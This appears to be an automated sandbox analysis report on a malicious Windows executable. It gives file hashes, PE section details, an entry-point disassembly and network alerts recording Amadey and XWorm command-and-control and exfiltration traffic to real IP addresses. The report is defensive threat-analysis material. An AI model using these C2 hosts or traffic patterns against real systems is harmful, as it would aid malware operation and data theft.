                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1927680
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.952173231018088
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:49152:FWpKS5ThF8/65kDlsW+eN3hyN0T3VsPhGlhFr5:FWcSKUkDlsJ0q0lfr
                                                                                                                                                                                                                                                                                    MD5:6AED281D1464E3A53839BBD9E7190535
                                                                                                                                                                                                                                                                                    SHA1:8EA6E9EC2EB3970E0C361538FB6DBD074E5FA6C2
                                                                                                                                                                                                                                                                                    SHA-256:A20ABE49E71912D860044FDF813C7FB90F32FDE51097DB4B689CAC9C8F7A9AC9
                                                                                                                                                                                                                                                                                    SHA-512:3D3312DBC5D3537143F8EE75097E9DFA5A88C59B3D0079461A6878BA1AAFA232A131E8078DBF08D5E62BDD84F5833E900D4B8E0F37E80B3BBCAB996B725E5366
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................pL...........@...........................L.....f.....@.................................W...k.......H....................[L.............................t[L..................................................... . ............................@....rsrc...H...........................@....idata ............................@... .`+.........................@...fjmpujlc.P....2..L..................@...jlhbczjq.....`L......D..............@....taggant.0...pL.."...H..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):55
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):290
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.4355451961965313
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:xIDbYvbX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lBwact0:xI/YzuQ1CGAFifXVBwact0
                                                                                                                                                                                                                                                                                    MD5:4E392015645F8F48537184B5538A4C13
                                                                                                                                                                                                                                                                                    SHA1:913CDD671A511B8E26104705478EFF38DBF6350C
                                                                                                                                                                                                                                                                                    SHA-256:F9DE53A3FB8C8F6FB6E67BF5125F5F0ACD99DD6938591A6F17837350B7C2EAB4
                                                                                                                                                                                                                                                                                    SHA-512:D955490C184345FB00D28529E0589BDD0184138873400BDA1DE67DEEFAD04947BACE76870450C246354F06646D8617933B8B9BA96C1F2C0051060497478EF99F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:..../-.{Y..B..|(a...F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................
                                                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.952173231018088
                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                    File name:file.exe
                                                                                                                                                                                                                                                                                    File size:1'927'680 bytes
                                                                                                                                                                                                                                                                                    MD5:6aed281d1464e3a53839bbd9e7190535
                                                                                                                                                                                                                                                                                    SHA1:8ea6e9ec2eb3970e0c361538fb6dbd074e5fa6c2
                                                                                                                                                                                                                                                                                    SHA256:a20abe49e71912d860044fdf813c7fb90f32fde51097db4b689cac9c8f7a9ac9
                                                                                                                                                                                                                                                                                    SHA512:3d3312dbc5d3537143f8ee75097e9dfa5a88c59b3d0079461a6878ba1aafa232a131e8078dbf08d5e62bdd84f5833e900d4b8e0f37e80b3bbcab996b725e5366
                                                                                                                                                                                                                                                                                    SSDEEP:49152:FWpKS5ThF8/65kDlsW+eN3hyN0T3VsPhGlhFr5:FWcSKUkDlsJ0q0lfr
                                                                                                                                                                                                                                                                                    TLSH:969533F98F16D4B5D05ED9F263DE8A201ACC4D4E059EC90A9FDC67B4D91A23FAD4080E
                                                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                                                    Entrypoint:0x8c7000
                                                                                                                                                                                                                                                                                    Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                    Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                                    jmp 00007F8480E42DAAh
                                                                                                                                                                                                                                                                                    cmovs ebx, dword ptr [00000000h]
                                                                                                                                                                                                                                                                                    add cl, ch
                                                                                                                                                                                                                                                                                    add byte ptr [eax], ah
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [edx], al
                                                                                                                                                                                                                                                                                    or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], dh
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax+00000000h], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [edx], ah
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [ecx], cl
                                                                                                                                                                                                                                                                                    add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    adc byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add cl, byte ptr [edx]
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    xor byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    and byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    and dword ptr [eax], eax
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    adc byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add eax, 0000000Ah
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax+0Ah], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    pop es
                                                                                                                                                                                                                                                                                    add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    adc byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add cl, byte ptr [edx]
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    xor byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    and byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    and dword ptr [eax], eax
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    or al, 80h
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x448.rsrc
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c5bc40x10fjmpujlc
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x4c5b740x18fjmpujlc
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                    0x10000x680000x2de00a059e472e0c6773abc419a323cb148d6False0.9980096219346049data7.982732781787212IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                    .rsrc0x690000x4480x60023f61aeefa7c3d30c07a21aa8f45e969False0.3053385416666667data5.28505835027857IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                    .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                    0x6b0000x2b60000x200cb269affa1bc465fb7a236c9119aeff3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                    fjmpujlc0x3210000x1a50000x1a4c004c06e5dbb0131da95f220c8a6e1f43b9False0.9948450497623291data7.954406052797792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                    jlhbczjq0x4c60000x10000x400254cb1664c69326ea458edea84b970b6False0.78515625data6.089103054058254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                    .taggant0x4c70000x30000x22006cae88bcbd4a5f304007d3eae6c8c624False0.05824908088235294DOS executable (COM)0.6816341029974392IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                    RT_MANIFEST0x690700x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                                                                                                                    RT_MANIFEST0x692c80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                                                    kernel32.dlllstrcpy
                                                                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                    2024-11-21T22:12:06.429773+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.549812185.215.113.4380TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:12:12.018423+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549824188.165.52.14443TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:12:35.903759+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.549818TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:12:37.303034+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549880185.215.113.4380TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:15:48.704936+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.55033720.189.173.5443TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:17:33.115436+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.550124185.215.113.4380TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:18:33.139564+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.55014731.41.244.1180TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:18:35.866719+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.550146TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:18:37.261656+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.550148185.215.113.4380TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:18:48.253731+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.550152149.154.167.220443TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:18:57.523762+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:02.521650+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:05.664794+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:05.665706+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.55015587.120.112.338398TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:07.533863+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:12.557719+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:17.556558+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:18.544558+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:18.545627+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.55015587.120.112.338398TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:19.107631+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:19.107631+01002858924ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:22.562733+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:28.058952+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:31.595832+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:31.596692+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.55015587.120.112.338398TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:32.591445+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:37.572545+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:42.573533+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:44.325519+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:44.327464+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.55015587.120.112.338398TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:47.583027+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:49.281235+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:52.583310+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:57.216603+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:57.223703+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.55015587.120.112.338398TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:19:57.591256+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:20:02.599360+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:20:07.603262+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:20:10.186673+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:20:10.187579+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.55015587.120.112.338398TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:20:11.193125+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550179TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:20:12.593833+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    2024-11-21T22:20:18.111294+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.550155TCP
                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:04.726058960 CET4981280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:04.996674061 CET8049812185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:04.996774912 CET4981280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:04.997021914 CET4981280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:05.116513968 CET8049812185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:06.429641962 CET8049812185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:06.429773092 CET4981280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:07.938185930 CET4981280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:07.938757896 CET4981880192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:08.058999062 CET8049818185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:08.059155941 CET4981880192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:08.059278011 CET8049812185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:08.059334040 CET4981280192.168.2.5185.215.113.43
